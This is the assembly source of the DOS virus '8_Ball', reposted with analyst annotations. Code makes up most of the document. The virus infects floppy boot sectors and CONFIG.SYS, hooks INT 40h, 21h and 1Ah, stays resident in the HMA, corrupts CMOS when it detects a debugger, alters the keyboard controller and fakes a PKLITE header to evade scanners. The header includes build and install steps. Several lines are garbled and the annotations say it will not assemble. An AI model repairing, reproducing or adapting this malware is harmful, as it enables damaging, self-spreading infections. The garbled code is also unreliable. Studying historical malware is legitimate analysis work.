8ball源程式!!! (轉)
designed by "Q" the misanthrope.
comment *
8_Ball is a multipartite, momentarily non-resident C:CONFIG.SYS infector
that creates randomly named INSTALL= programs and is an HMA stealth memory
resident floppy boot sector infector. Virus scanners will not be able to
scan for this virus because it does not infect executable files. The payload
is an anti-debug routine that will corrupt the CMOS and still go memory resident
if debugged. It also will disable the keyboard key lock. It is an
improvement over Q_Ball. Also uses the PKLITE header confuser for TBAV and
AVP.
[Editorial note: the scanner-evasion claim above is the author's; the listing below is annotated for analysis only and is transcribed with several garbled lines, so it will not assemble as given.]
Example CONFIG.SYS:
BUFFERS=17
FILES=30
INSTALL=AOAN.MCO
tasm 8_ball /m2
tlink 8_ball
exe2bin 8_ball.exe 8_ball.
format a:/q/u
debug 8_ball.com
l 300 0 0 1
w 100 0 0 1
w 300 0 20 1
m 11c,2fe 100
rcx
1e2
w
q
*
; NOTE(review): historical DOS boot-sector / CONFIG.SYS virus ("8_Ball"),
; kept here for analysis. The listing is annotated, not repaired: several
; lines are garbled in transcription (flagged below) and it will not
; assemble as-is. Do not "fix" and build it.
;
; The same 512-byte image serves three roles depending on where it runs:
; boot sector (entry at 'top'), COM dropper (entry at 'com_install', offset
; 0100h in the dropped file) and resident INT 40h hook copied to the HMA.
; Body offsets are therefore written as '+7c00h' / '+7e00h-02h' / '+0100h'.
.286
qseg segment byte public 'CODE'
assume cs:qseg, es:qseg, ss:nothing, ds:qseg
; Boot-sector header: 2-byte jump, pad byte, OEM name, then a DOS BPB whose
; values match a 1.44 MB floppy. set_cx_dx reads three of these fields from a
; victim sector ([bx+11h], [bx+16h], [bx+18h]).
top: jmp short install
90h                      ; garbled: bare operand; a 'db 90h' (NOP pad) is presumably intended
db 'MSDOS5.0'            ; OEM name
dw 512                   ; bytes per sector
db 1                     ; sectors per cluster
dw 1                     ; reserved sectors
db 2                     ; number of FATs
dw 224                   ; root directory entries (offset 11h)
dw 2880                  ; total sectors
db 0F0h                  ; media descriptor
dw 9                     ; sectors per FAT (offset 16h)
dw 18                    ; sectors per track (offset 18h)
dw 2                     ; heads
; COM-file entry: the randomly named INSTALL= program referenced from
; CONFIG.SYS starts here (offset 0100h of the dropped file, since
; interrupt_21 writes the image from com_install onward). The leading "PK"
; bytes mimic a PKLITE header (author's claim: confuses TBAV/AVP).
; Installs next_part as the INT 06h (invalid-opcode) handler, then executes
; an undefined encoding so next_part runs as an exception handler, with the
; flags image left on the stack for go_mem_res to popf.
com_install proc near
db "PK"
mov ax, 3506h                           ; get INT 06h vector -> es:bx (restored at end_it)
mov dx, next_part-com_install+0100h     ; ds:dx = next_part as laid out in the COM image
int 21h
mov ah, 25h                             ; set INT 06h -> ds:dx (al still 06h)
int 21h
db 08dh, 0d3h                           ; 8D D3 = LEA with a register operand: #UD -> INT 06h -> next_part
end_it: push es                         ; entered by 'jmp end_it' from go_mem_res; es:dx = saved INT 06h vector
pop ds
int 21h                                 ; ax presumably 2506h again after popa: restore INT 06h
int 20h                                 ; terminate
com_install endp
; Boot-sector entry (target of the jump at 'top'). Deliberately obfuscated:
; the call/retf pair below is a far transfer built from values pushed earlier.
; Appears to rely on the BIOS convention cs = 0000h (so ds addresses the IVT)
; and bx = 7C00h (sector buffer offset) -- neither is verified here.
; What it seems to do: copy the sector image twice into text-mode video RAM
; (segment B800h; offsets bx and bx+1FEh, i.e. the '+7c00h' and '+7e00h-02h'
; copies referenced elsewhere), continue executing from that copy, save the
; INT 1Ah vector into the second copy's previous_hook, and hook INT 1Ah with
; first_hook. The MDA (mono) branch keeps es = bx instead; its behaviour is
; not analysed here.
install proc near
push cs
mov si, bx
push bx
push cs
cld
pop ds                                  ; ds = cs
mov es, bx                              ; mono fallback: es taken from bx
cmp ptr ds:[0449h], 07h                 ; garbled: operand size missing; 0040:0049h is the BIOS video-mode byte, 07h = MDA text
je monochrome
push 0b800h                             ; colour text-mode video RAM
pop es
cmp word ptr es:[si+negative_1-top+01h], -1 ; already present in video RAM? (the -1 immediate of 'mov di,-1' acts as marker)
monochrome: push es
push si
mov cx, offset previous_hook            ; 1FEh bytes: whole image minus the far-pointer slot
pop di
push si
push cx
rep movsb                               ; first copy -> es:bx
pop cx
pop si
call return_far                         ; push IP; retf pops IP and the es pushed at 'monochrome' as CS
rep movsb                               ; second copy, immediately after the first (-> bx+1FEh)
mov si, 1ah*04h                         ; si -> INT 1Ah vector slot (ds presumed 0000h)
je already_res                          ; ZF from the marker compare: already hooked, skip
movsw                                   ; save current INT 1Ah into the second copy's previous_hook
movsw
mov word ptr ds:[si-02h], cs            ; INT 1Ah -> cs:first_hook in the second copy
mov word ptr ds:[si-04h], offset first_hook+7e00h-02h
already_res: push ds
pop es
re_get_boot: mov ax, 0201h              ; also called (far) from next_line: BIOS read 1 sector...
call set_cx_dx                          ; ...from the location where the original boot sector is stashed
return_far: retf                        ; shared far-return trampoline
install endp
; INT 06h handler reached from com_install. Anti-debug check: compares the
; first byte of the INT 01h (single-step) handler with 0CFh (IRET). If a
; debugger has installed its own INT 01h handler the compare fails and a
; CMOS write is performed before falling into go_mem_res anyway.
next_part proc near
pop dx                                  ; discard the exception frame's return IP
pop dx                                  ; discard its CS; the flags word stays for popf at get_out
mov dx,bx                               ; dx = offset of the saved INT 06h vector (from AH=35h in com_install)
pusha
negative_1: mov di, -1                  ; the -1 immediate doubles as the infection marker tested by install/next_line
push es
push ds
mov ax, 3501h                           ; get INT 01h vector -> es:bx
int 21h
cmp byte ptr es:[bx], 00h               ; the 00h immediate is overlaid by the IRET opcode below...
org $-1
iret                                    ; ...so the encoded compare is against 0CFh; this byte is data, not executed
mov al, 2eh                             ; CMOS index 2Eh (does not touch ZF)
je go_mem_res                           ; INT 01h still points at an IRET: no debugger, skip the payload
out 70h, ax                             ; 16-bit OUT: al -> 70h (CMOS index), ah -> 71h (CMOS data): corrupts CMOS
next_part endp
; Go resident in the HMA (DOS 5+ INT 2Fh AX=4A02h allocation): saves the
; current INT 40h (floppy BIOS) vector into the image, copies the 512-byte
; COM image to the HMA, points INT 40h at that copy's interrupt_40, then
; reprograms the 8042 keyboard controller command byte. All paths end at
; get_out, which unwinds next_part's pushes and returns to end_it.
go_mem_res proc near
mov ax, 3540h                           ; get INT 40h vector -> es:bx
mov si, 0100h                           ; si = COM image start; reused below as word count (512 bytes)
int 21h
mov word ptr ds:[previous_hook-com_install+0100h], bx   ; stash old INT 40h in the image's previous_hook
mov word ptr ds:[previous_hook-com_install+0102h], es
mov ax, es
inc ax                                  ; es == 0FFFFh (HMA segment) => already resident
mov ax, 4a02h                           ; mov leaves ZF from the inc
jz get_out
mov bx, 0200h                           ; request 512 bytes of HMA
int 2fh                                 ; -> es:di; di = 0FFFFh when none available
inc di
jz get_out
lea cx, word ptr ds:[si]                ; cx = 0100h words
rep movsw                               ; copy ds:0100h -> HMA es:di
push es
lea dx, word ptr ds:[di+interrupt_40-com_install-0200h]  ; di advanced 0200h by the copy; back it out
mov ax, 2540h                           ; set INT 40h -> HMA:interrupt_40
pop ds
int 21h
mov al,60h                              ; 8042 command 60h: write command byte
out 64h,al
get_status: in al,64h
test al,02h                             ; input-buffer-full bit: wait until clear
lnz get_status                          ; garbled: not a valid mnemonic (a conditional jump back to get_status is intended)
mov al,4bh                              ; new command byte (author's claim: overrides the keyboard lock)
out 60h,al
get_out: pop ds                         ; pushes from next_part
pop es
popa
popf                                    ; flags word left from the INT 06h frame
jmp end_it
go_mem_res endp
; Text used by interrupt_21 to append "INSTALL=C:<name>" + CR/LF to
; CONFIG.SYS. <name> is produced at run time by the DOS create-temp-file
; call (AH=5Ah), which writes an 8-character name after the "C:".
install_name db 'INSTALL='
file_name db 'C:'                       ; generated name is appended here
db 00h
dot equ $+3                             ; file_name+6: interrupt_21 writes '.' here, giving a 4.3 name
crlf equ $+7                            ; file_name+10: CR/LF written here before the append
config_line db "c:config.sys",00        ; target file, as written (no leading backslash)
; Computes the CHS location where the original boot sector is stashed and
; issues the INT 40h request already set up in ax by the caller (0201h read
; or 0301h write). Reads BPB fields from the sector image at ds:bx:
;   cx = 2*[bx+16h] (two FATs) + [bx+11h]/16 (root-dir sectors) + 1 - [bx+18h]
;   dh = 1
; i.e. a sector on head 1 derived from the end of the root directory (the
; exact packing of track/sector in cx is not unpacked here). Clobbers bp, cx,
; dh; dl (drive) is left as supplied.
set_cx_dx proc near
mov bp, word ptr ds:[bx+11h]            ; root directory entries
shr bp, 04h                             ; /16 -> root directory sectors (32-byte entries, 512-byte sectors)
mov cx, word ptr ds:[bx+16h]            ; sectors per FAT
shl cx, 01h                             ; two FATs
add cx, bp
inc cx                                  ; + boot sector
sub cx, word ptr ds:[bx+18h]            ; - sectors per track
mov dh, 01h                             ; head 1
int 40h                                 ; ah = 02h/03h from caller
retn
set_cx_dx endp
v_name db "8_Ball -=Q=-"                ; author's signature string; not referenced by the code
; One-shot INT 21h hook installed by first_hook once DOS is up. first_hook
; also copied the original INT 21h vector into the INT 18h slot, so every
; 'int 18h' below is a call into DOS that bypasses this hook.
; On the first INT 21h that is not EXEC (AH=4Bh): strips attributes from
; c:config.sys, obtains a random 8-char name via create-temp-file, deletes
; that temp file, creates C:<4>.<3> (read-only+system) containing the image
; from com_install onward, appends "INSTALL=C:<name>" to CONFIG.SYS, then
; restores the original INT 21h vector. Runs in the '+7c00h' copy; the data
; references use the '+7e00h-02h' copy.
interrupt_21 proc near
pushf
pusha
push ds
push cs
pop ds
cmp ah, 4bh                             ; EXEC in progress: do nothing but unhook
je set_21_back
sub cx, cx
mov ax, 4301h                           ; set attributes of c:config.sys to 0 (clear R/H/S)
mov dx, offset config_line+7e00h-02h
int 18h
mov dl, low(offset file_name+7e00h-02h) ; only dl changed: relies on file_name/config_line sharing the high address byte
mov ah, 5ah                             ; create unique file in "C:" -> handle in ax; name appended to file_name
jc keep_trying                          ; attribute call failed: leave the hook in place and retry on the next call
int 18h
mov bh, 3eh
xchg ax, bx                             ; bx = handle, ah = 3Eh (close)
int 18h
mov ah, 41h                             ; delete the temp file; only its random name is kept
int 18h
mov cl, 05h                             ; attributes for the dropper: read-only + system
mov ax, 5b2eh                           ; ah = 5Bh create-new, al = '.'
mov byte ptr ds:[dot+7e00h-02h], al     ; 8-char name -> 4.3 name
int 18h
mov bh, 40h
xchg ax, bx                             ; bx = handle, ah = 40h (write)
mov dx, offset com_install+7c00h        ; source: image from the COM stub onward
mov ch, 02h                             ; cx = 0205h bytes (cl apparently still 05h)
int 18h
mov ah, 3eh                             ; close dropper
int 18h
mov dl, low(offset config_line+7c00h)   ; again only dl; effective dx depends on dh left above (not resolved here)
mov ax, 3d42h                           ; open read/write, deny-none
int 18h
xchg ax, bx                             ; bx = handle
mov ax, 4202h                           ; lseek to end (cx:dx = 0)
cwd
sub cx, cx
int 18h
mov word ptr ds:[crlf+7e00h-02h], 0a0dh ; terminate the new line with CR LF
mov ah, 40h                             ; write "INSTALL=C:xxxx.xxx\r\n"
mov dx, offset install_name+7e00h-02h
mov cl, low(crlf-install_name+02h)
int 18h
mov ah, 3eh                             ; close config.sys
int 18h
set_21_back: lds dx, dword ptr ds:[previous_hook+7c00h]  ; original INT 21h saved by first_hook
mov ax, 2521h                           ; restore it: the hook fires once
int 18h
keep_trying: jmp pop_ds_and_all         ; unwind, then fall into far_jmp -> original INT 21h
interrupt_21 endp
; Called from interrupt_40 after the original INT 40h read track 0 /
; sector 1 into es:bx. Recovers the address of its own copy from the return
; address, then either infects the freshly read sector (stashing the original
; first) or, if the sector already carries the marker, re-reads the stashed
; original into the buffer so the caller never sees the infected sector.
; Unwinds interrupt_40's pushes itself and returns to the INT 40h caller.
next_line proc near
pop ax                                  ; ax = return address (return_point) within this copy
add ax, -(return_point-com_install)     ; ax -> com_install of this copy (position-independent)
xchg ax, si                             ; si = copy source
push ds
push es
pop ds                                  ; ds = es = caller's buffer segment
cmp word ptr ds:[bx+negative_1-top+01h], -1 ; infection marker present (the -1 of 'mov di,-1')?
je get_old_bs
mov ax, 0301h                           ; INT 40h write 1 sector...
pusha
call set_cx_dx                          ; ...stash the clean boot sector at the computed CHS
cld
mov cx, previous_hook-com_install       ; body length; the victim's own BPB (before com_install-top) is kept
lea di, word ptr ds:[bx+com_install-top]
rep movs byte ptr es:[di], cs:[si]      ; overlay the body onto the sector image
mov word ptr ds:[bx], 0000h             ; the 0000h immediate is overlaid by the 2-byte jump below...
org $-2
jmp $(install-top)                      ; garbled in transcription; a short jump to 'install' is intended as the sector's first bytes
popa                                    ; ax = 0301h, cx = 0001h, dx = caller's head 0 / drive
int 40h                                 ; write the infected image back to track 0 / sector 1
get_old_bs: push cs
call re_get_boot                        ; far call (cs pushed): re-read the stashed original into the buffer
pop ds
popa                                    ; registers pushed by interrupt_40
popf
return_far_2: retf 02h                  ; return to the INT 40h caller, discarding its saved flags
next_line endp
; Resident INT 40h (floppy BIOS) hook living in the HMA copy. Forwards every
; request to the original handler via far_jmp; when the request is a read
; (AH=02h) of one sector at track 0 / sector 1 (CX=0001h) on head 0
; (DH == CH == 0) and it succeeds, hands the buffer to next_line.
interrupt_40 proc near
cmp cx, 0001h                           ; track 0, sector 1
jne jne_far_jmp
cmp ah, 02h                             ; BIOS read
jne jne_far_jmp
cmp dh, ch                              ; head 0 (ch is 0 here)
jne_far_jmp: jne far_jmp                ; anything else: tail-jump to the original handler
pushf
push cs
call far_jmp                            ; emulate an INT: the original handler's IRET returns here
jc return_far_2                         ; read failed: return to the caller (retf 2 drops the pushed flags)
pushf
pusha
call next_line                          ; does not return here; next_line unwinds these pushes
return_point label byte
interrupt_40 endp
; INT 1Ah hook installed by install at boot time, pinned to offset 1C2h so
; that it is exactly 3Ah bytes long and falls through into far_jmp at 1FCh
; (which chains to the INT 1Ah vector saved in this copy's previous_hook).
; On each INT 1Ah it asks DOS whether it is installed yet (INT 2Fh AX=1200h
; returns AL=0FFh when it is); until then it only passes through. Once DOS is
; up: restores the original INT 1Ah, mirrors the live INT 21h into the INT 18h
; slot (interrupt_21's call gate into DOS) and into previous_hook of the
; '+7c00h' copy, then hooks INT 21h with interrupt_21.
org 001c2h
first_hook proc near
pushf
pusha
mov ax, 1200h                           ; DOS installation check
push ds
push es
cwd                                     ; dx = 0 (ax < 8000h): IVT segment
int 2fh
inc al                                  ; al was 0FFh -> DOS present
mov ds, dx                              ; ds = 0000h
mov si, 21h*04h                         ; si -> INT 21h slot
mov di, offset previous_hook+7c00h      ; destination for the saved INT 21h vector
jnz pop_it                              ; DOS not ready: pass through
les bx, dword ptr cs:[previous_hook+7e00h-02h]  ; original INT 1Ah saved by install
mov ds:[si-((21h-1ah)*04h)+2], es       ; put it back into the INT 1Ah slot
mov ds:[si-((21h-1ah)*04h)], bx
les bx,dword ptr ds:[si]                ; current INT 21h
mov ds:[si-((21h-18h)*04h)+2], es       ; copy it into the INT 18h slot
push cs
cld
mov ds:[si-((21h-18h)*04h)], bx
pop es                                  ; es = cs
movsw                                   ; INT 21h vector -> cs:previous_hook+7c00h
movsw
mov word ptr ds:[si-04h], offset interrupt_21+7c00h   ; INT 21h -> cs:interrupt_21
mov word ptr ds:[si-02h], cs
pop_it: pop es
pop_ds_and_all: pop ds                  ; also interrupt_21's exit path
popa
popf                                    ; no IRET: falls through into far_jmp below
first_hook endp
; Shared exit for all three hooks. Each copy of the image ends here, so the
; far jump takes whatever vector that copy's previous_hook holds: the old
; INT 40h in the HMA copy, INT 21h in the '+7c00h' copy, INT 1Ah in the
; '+7e00h-02h' copy. The 4-byte pointer is written over the 0AA55h boot
; signature at run time; on disk the image still ends with a valid signature.
org 001fch
far_jmp proc near
sti
db 0eah                                 ; JMP FAR ptr16:16 opcode; its operand is previous_hook
previous_hook: label double             ; 'double' is not a TASM label type; 'dword' presumably intended
far_jmp endp
boot_signature dw 0aa55h                ; offset 1FEh: BIOS boot signature, storage shared with previous_hook
qseg ends
end